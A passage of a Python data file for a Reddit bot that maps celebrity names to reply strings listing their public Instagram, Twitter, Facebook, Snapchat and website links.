Snapchat: AnnaFaithBae \n
[Instagram](https://instagram.com/annafaithxoxo/)\n
[Twitter](https://twitter.com/TheAnnaFaith)\n
[YouTube channel](https://www.youtube.com/channel/UCTcBaZEehmQeydOl1LTM_5Q/)\n
\n-\n
**Lexie Grace**\n
[Instagram](https://instagram.com/Lexiegracelove/)\n
[Twitter](https://twitter.com/lexiegracelove)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
TaylorHannum = ("taylor", "hannum")
TaylorHannumReply = """
[Instagram](https://instagram.com/taylorhannum_)\n
[Twitter](https://twitter.com/TaylorHannum)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
CaraDelevingne = ("cara", "delevingne")
CaraDelevingneReply = """
[Instagram](https://instagram.com/caradelevingne/)\n
[Twitter](https://twitter.com/Caradelevingne)\n
[Tumblr](http://iamcaradelevingne.tumblr.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
LenaGercke = ("lena", "gercke")
LenaGerckeReply = """
[Instagram](https://instagram.com/lenagercke/)\n
[Facebook](https://www.facebook.com/pages/Lena-Gercke/439297919435120)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
JenniferMorrison = ("jen", "jennifer", "jenny", "morrison")
JenniferMorrisonReply = """
[Instagram](https://instagram.com/jenmorrisonlive/)\n
[Twitter](https://twitter.com/jenmorrisonlive/)\n
[Facebook](https://www.facebook.com/JenniferMorrisonOfficial)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
MargotRobbie = ("margot", "robbie")
MargotRobbieReply = """
[Instagram](https://instagram.com/margotrobbieofficial)\n
[Twitter](https://twitter.com/MargotRobbie)\n
[Website](http://www.margotrobbie.com.au/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
AlyssaArce = ("alyssa", "arce")
AlyssaArceReply = """
[Instagram](https://instagram.com/miss_alyssaarce/)\n
[Twitter](https://twitter.com/missalyssaarce)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
MirandaKerr = ("miranda", "kerr")
MirandaKerrReply = """
[Instagram](https://instagram.com/mirandakerr/)\n
[Twitter](https://twitter.com/mirandakerr)\n
[Facebook](https://www.facebook.com/MirandaKerr)\n
[Website](http://www.mirandakerr.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KarlieKloss = ("karlie", "kloss")
KarlieKlossReply = """
[Instagram](https://instagram.com/karliekloss/)\n
[Twitter](https://twitter.com/karliekloss/)\n
[YouTube channel: Klossy](https://www.youtube.com/c/karliekloss)\n
[Facebook](https://www.facebook.com/KarlieKloss)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
ElsaHosk = ("elsa", "hosk")
ElsaHoskReply = """
[Instagram](https://instagram.com/hoskelsa/)\n
[Twitter](https://twitter.com/elsahosk)\n
[Facebook](https://www.facebook.com/hoskelsa)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
CandiceSwanepoel = ("candice", "swanepoel")
CandiceSwanepoelReply = """
[Instagram](https://instagram.com/angelcandices)\n
[Twitter](https://twitter.com/angelcandice/)\n
[Facebook](https://www.facebook.com/angelcandices)\n
[Website](http://www.candiceswanepoel.com/home.php)\n
[Pinterest](https://www.pinterest.com/angelcandice/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
MeganFox = ("megan", "fox")
MeganFoxReply = """
[Instagram](https://instagram.com/the_native_tiger/)\n
[Twitter](https://twitter.com/meganfox)\n
[Facebook](https://www.facebook.com/MeganFox)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
IzzyMarshall = ("izzy", "marshall")
IzzyMarshallReply = """
[Instagram](https://instagram.com/_izzymarshall/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
ArianaGrande = ("ariana", "grande")
ArianaGrandeReply = """
Snapchat: moonlightbae
[Instagram](https://instagram.com/arianagrande)\n
[Twitter](https://twitter.com/arianagrande)\n
[YouTube channel(personal)](https://www.youtube.com/user/osnapitzari)\n
[Facebook](https://www.facebook.com/arianagrande)\n
[YouTubeVEVO](https://www.youtube.com/user/ArianaGrandeVevo)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
NathalieEmmanuel = ("nathalie", "emmanuel")
NathalieEmmanuelReply = """
[Instagram](https://instagram.com/nathalieemmanuel/)\n
[Twitter](https://twitter.com/missnemmanuel)\n
[Tumblr tag (nsfw)](https://www.tumblr.com/search/nathalie+emmanuel)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
HannahFerguson = ("hannah", "ferguson")
HannahFergusonReply = """
[Instagram](https://instagram.com/hannahfergusonofficial/)\n
[Twitter](https://twitter.com/thehannahferg)\n
[Facebook](https://www.facebook.com/TheHannahFerg)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KateHudson = ("kate", "hudson")
KateHudsonReply = """
[Instagram](https://instagram.com/katehudson/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
NinaDobrev = ("nina", "dobrev")
NinaDobrevReply = """
[Instagram](https://instagram.com/ninadobrev)\n
[Twitter](https://twitter.com/ninadobrev/)\n
[Tumblr](https://ninadobrev.tumblr.com/)\n
[Facebook](https://www.facebook.com/NinaDobrev)\n
[Website/whosay](http://www.ninadobrev.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
DaphneJoy = ("daphne", "joy")
DaphneJoyReply = """
Snapchat: DaphneJoyLove \n
[Instagram](https://instagram.com/daphnejoy/)\n
[Twitter](https://twitter.com/DaphneJoy)\n
[Website](http://www.daphnejoy.com/site/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
EmilyRudd = ("emily", "rudd")
EmilyRuddReply = """
Snapchat: emilysteaparty \n
[Instagram](https://instagram.com/emilysteaparty/)\n
[Twitter](https://www.twitter.com/emilysteaparty)\n
[Tumblr](https://emilysteaparty.tumblr.com)\n
[YouTube channel](https://www.youtube.com/user/emilysteaparty)\n
[Facebook](https://www.facebook.com/emilyruddofficial)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
OliviaCulpo = ("olivia", "culpo")
OliviaCulpoReply = """
[Instagram](https://instagram.com/oliviaculpo)\n
[Twitter](https://twitter.com/oliviaculpo)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
OdetteAnnable = ("odette", "annable")
OdetteAnnableReply = """
[Instagram](https://instagram.com/odetteannable)\n
[Twitter](https://twitter.com/OdetteAnnable)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
OlgaKurylenko = ("olga", "kurylenko")
OlgaKurylenkoReply = """
[Instagram](https://instagram.com/olgakurylenkoofficial/)\n
[Twitter](https://twitter.com/OlyaKurylenko)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
BrendaSong = ("brenda", "song")
BrendaSongReply = """
/r/BrendaSong \n
[Instagram](https://instagram.com/brendasong)\n
[Twitter](https://twitter.com/BrendaSong)\n
[Facebook](https://www.facebook.com/BrendaSong)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
CarolSeleme = ("carol", "seleme")
CarolSelemeReply = """
[Instagram](https://instagram.com/cadeque/)\n
[Tumblr](http://moorslorac.tumblr.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
AlessandraAmbrosio = ("alessandra", "ambrosio")
AlessandraAmbrosioReply = """
[Instagram](https://instagram.com/alessandraambrosio)\n
[Twitter](https://twitter.com/angelalessandra)\n
[Facebook](https://www.facebook.com/Alessandra)\n
[Website](http://www.alessandraambrosio.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
AlexSchmidt = ("alex", "schmidt")
AlexSchmidtReply = """
[Instagram](https://instagram.com/alxxschmidt/)\n
[Tumblr](http://alxxschmidt.tumblr.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
RachelHilbert = ("rachel", "hilbert")
RachelHilbertReply = """
Snapchat: rachelhilbert \n
[Instagram](https://instagram.com/rachelhilbert/)\n
[Twitter](https://twitter.com/rachel_hil)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
DevonWindsor = ("devon", "windsor")
DevonWindsorReply = """
[Instagram](https://instagram.com/devwindsor/)\n
[Twitter](https://twitter.com/devwindsor/)\n
[Facebook](https://www.facebook.com/devwindsor)\n
[Website](http://www.devonwindsor.com/home/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
TaylorMarieHill = ("taylor", "marie", "hill")
TaylorMarieHillReply = """
Snapchat: taylor_hill \n
[Instagram](https://instagram.com/taylor_hill/)\n
[Twitter](https://twitter.com/TaylorMarieHill)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KateMara = ("kate", "mara")
KateMaraReply = """
[Twitter](https://twitter.com/katemara)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
ChloeGraceMortz = ("chloe", "grace", "mortz")
ChloeGraceMortzReply = """
[Instagram](https://instagram.com/ChloeGMoretz)\n
[Twitter](https://twitter.com/chloegmoretz)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
CamilleRowe = ("camille", "camilla", "rowe")
CamilleRoweReply = """
[Instagram](https://instagram.com/fingermonkey/)\n
[Twitter](https://twitter.com/CamilleRowe)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
PeytonList = ("peyton", "list")
PeytonListReply = """
[Instagram](https://instagram.com/peytonlist)\n
[Twitter](https://twitter.com/peytonlist)\n
[Facebook](https://www.facebook.com/peyton.list)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
SammiHanratty = ("sammi", "hanratty")
SammiHanrattyReply = """
Snapchat: SammiHanratty1
[Instagram](https://instagram.com/sammihanratty143/)\n
[Twitter](https://twitter.com/SammiHanratty1)\n
[Facebook](https://www.facebook.com/TheOfficialSammiHanratty)\n
[YouTube channel](https://www.youtube.com/channel/UCJkIBX-nVKat9C-1PU7FiZg)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
MargotRobbie = ("margot", "robbie")
MargotRobbieReply = """
[Instagram](https://instagram.com/margotrobbie/)\n
[Twitter](https://twitter.com/MargotRobbie)\n
[Whosay](http://www.whosay.com/margotrobbie)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
LaurenCohan = ("lauren", "cohan")
LaurenCohanReply = """
[Instagram](https://instagram.com/LaurenCohan)\n
[Twitter](https://twitter.com/LaurenCohan)\n
[Website](http://laurencohan.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
CamilaCabello = ("camila", "cabello")
CamilaCabelloReply = """
[Instagram](https://instagram.com/camila_cabello/)\n
[Twitter](https://twitter.com/CamilaCabello97)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
YvonneStrahovski = ("yvonne", "strahovski")
YvonneStrahovskiReply = """
[Instagram](https://instagram.com/therealyvonnestrahovski/)\n
[Twitter](https://twitter.com/Y_Strahovski/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
OliviaMunn = ("olivia", "munn")
OliviaMunnReply = """
[Instagram](https://instagram.com/oliviamunn/)\n
[Twitter](https://twitter.com/oliviamunn)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KatharineMcphee = ("katharine", "mcphee")
KatharineMcpheeReply = """
[Instagram](https://instagram.com/katharinemcphee/)\n
[Twitter](https://twitter.com/KatharineMcPhee)\n
[Website](http://www.katharinemcphee.net/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
EmmaRoberts = ("emma", "roberts")
EmmaRobertsReply = """
[Instagram](https://instagram.com/emmaroberts/)\n
[Twitter](https://twitter.com/robertsemma)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
SalmaHayek = ("salma", "hayek")
SalmaHayekReply = """
[Instagram](https://instagram.com/salmahayek/)\n
[Twitter](https://twitter.com/salmahayek)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KatyaEliseHenry = ("katya", "elise", "henry")
KatyaEliseHenryReply = """
Snapchat: katyahenry \n
[Instagram](https://instagram.com/katyaelisehenry/)\n
[Twitter](https://twitter.com/katyaelisehenry)\n
[Facebook](https://www.facebook.com/katyaehenry)\n
[Website](http://www.katyaelisehenry.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
ElizabethGillies = ("elizabeth", "liz", "gillies")
ElizabethGilliesReply = """
/r/lizgillies \n
[Twitter](https://twitter.com/lizgillies)\n
[Facebook](https://www.facebook.com/ElizabethGilliesOfficial/timeline)\n
[YouTube channel](https://www.youtube.com/user/LizGilliesOfficial)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
MichelleJenneke = ("michelle", "jenneke")
MichelleJennekeReply = """
[Instagram](https://instagram.com/mjenneke93/)\n
[Twitter](https://twitter.com/MJenneke93)\n
[YouTube channel](https://www.youtube.com/channel/UCOiLtIb9UcXKkulRfMQem1g)\n
[Website](http://www.michellejenneke.com.au/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
GwenCox = ("gwen", "cox")
GwenCoxReply = """
Snapchat: gw3nnyy
[Instagram](https://instagram.com/hologrvphic/)\n
[Tumblr](http://hologrvphicx.tumblr.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
DakotaJohnson = ("dakota", "johnson")
DakotaJohnsonReply = """
[Instagram](https://instagram.com/dakotajohnson/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
CamillaLuddington = ("camilla", "luddington")
CamillaLuddingtonReply = """
[Instagram](https://instagram.com/officialcamillaluddington/)\n
[Twitter](https://twitter.com/camilluddington)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
JennaHopkins = ("jenna", "hopkins")
JennaHopkinsReply = """
[Instagram](https://instagram.com/jhopkins_/)\n
[Twitter](https://twitter.com/_jennahop)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
PriscillaQuintana = ("priscilla", "quintana")
PriscillaQuintanaReply = """
[Instagram](https://instagram.com/priscilla_quintana/)\n
[Twitter](https://twitter.com/_paq)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
RachaelFinch = ("rachael", "finch")
RachaelFinchReply = """
[Instagram](https://instagram.com/rachael_finch/)\n
[Twitter](https://twitter.com/RachaelFinch)\n
[YouTube channel](https://www.youtube.com/user/rachaelfinch)\n
[Facebook](https://www.facebook.com/rachaelfinchfanpage)\n
[Website](http://rachaelfinch.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
RachaelTaylor = ("rachael", "taylor")
RachaelTaylorReply = """
[Instagram](https://instagram.com/rachaelmaytaylor/)\n
[Twitter](https://twitter.com/_Rachael_Taylor)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
ElisabettaCanalis = ("elisabetta", "canalis")
ElisabettaCanalisReply = """
[Instagram](https://instagram.com/littlecrumb_)\n
[Twitter](https://twitter.com/justelisabetta)\n
[Website](http://www.elisabettacanalis.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
SolveigMorkHansen = ("solveig", "mork", "hansen")
SolveigMorkHansenReply = """
[Instagram](https://instagram.com/notsolveig)\n
[Twitter](https://twitter.com/mhsolveig)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
AlyssaMilano = ("alyssa", "milano")
AlyssaMilanoReply = """
[Instagram](https://instagram.com/milano_Alyssa/)\n
[Twitter: personal](https://twitter.com/Alyssa_Milano)\n
[Facebook](https://www.facebook.com/AlyssaMilano)\n
[Twitter: AlyssaDotCom](https://twitter.com/AlyssaDotCom)\n
[Twitter: TouchByAM](https://twitter.com/TouchByAM)\n
[Website](http://alyssa.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
FrancoiseBoufhal = ("francoise", "boufhal")
FrancoiseBoufhalReply = """
[Instagram](https://instagram.com/francoisebouf/)\n
[Twitter](https://twitter.com/francoisebouf)\n
[Facebook](https://www.facebook.com/officialfrancoise)\n
[YouTube channel](https://www.youtube.com/user/officialfrancoise)\n
[Website](http://www.officialfrancoise.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KimberleyGarner = ("kimberley", "garner")
KimberleyGarnerReply = """
[Instagram](https://instagram.com/kimberleylondon)\n
[Twitter](https://twitter.com/KimberleyLondon)\n
[Website](http://www.kimberleylondon.com/)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
CarlyCraig = ("carly", "craig")
CarlyCraigReply = """
[Instagram](https://instagram.com/carlyccraig/)\n
[Twitter](https://twitter.com/carly_craig)\n
[Facebook](https://www.facebook.com/CarlyCraigFB)\n
[YouTube channel](https://www.youtube.com/user/carlycraig)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
KarolinaKurkova = ("karolina", "kurkova")
KarolinaKurkovaReply = """
[Instagram](https://instagram.com/karolinakurkova)\n
[Twitter](https://twitter.com/KarolinaKurkova)\n
[Facebook](https://www.facebook.com/KarolinaKurkova)\n
\n-\n ^| ^v0.1 ^| ^I ^am ^a ^bot, ^accuracy ^not ^guaranteed ^| ^/r/Celeb_Username_Bot ^for ^questions, ^help, ^and ^bug ^reporting. ^| ^[Source](https://github.com/DrewsephA/Celeb_Username_Bot) ^|\n
"""
LindsayHeyser = ("lindsay", "heyser")
LindsayHeyserReply = """
[Instagram](https://instagram.com/lheyser/)\n
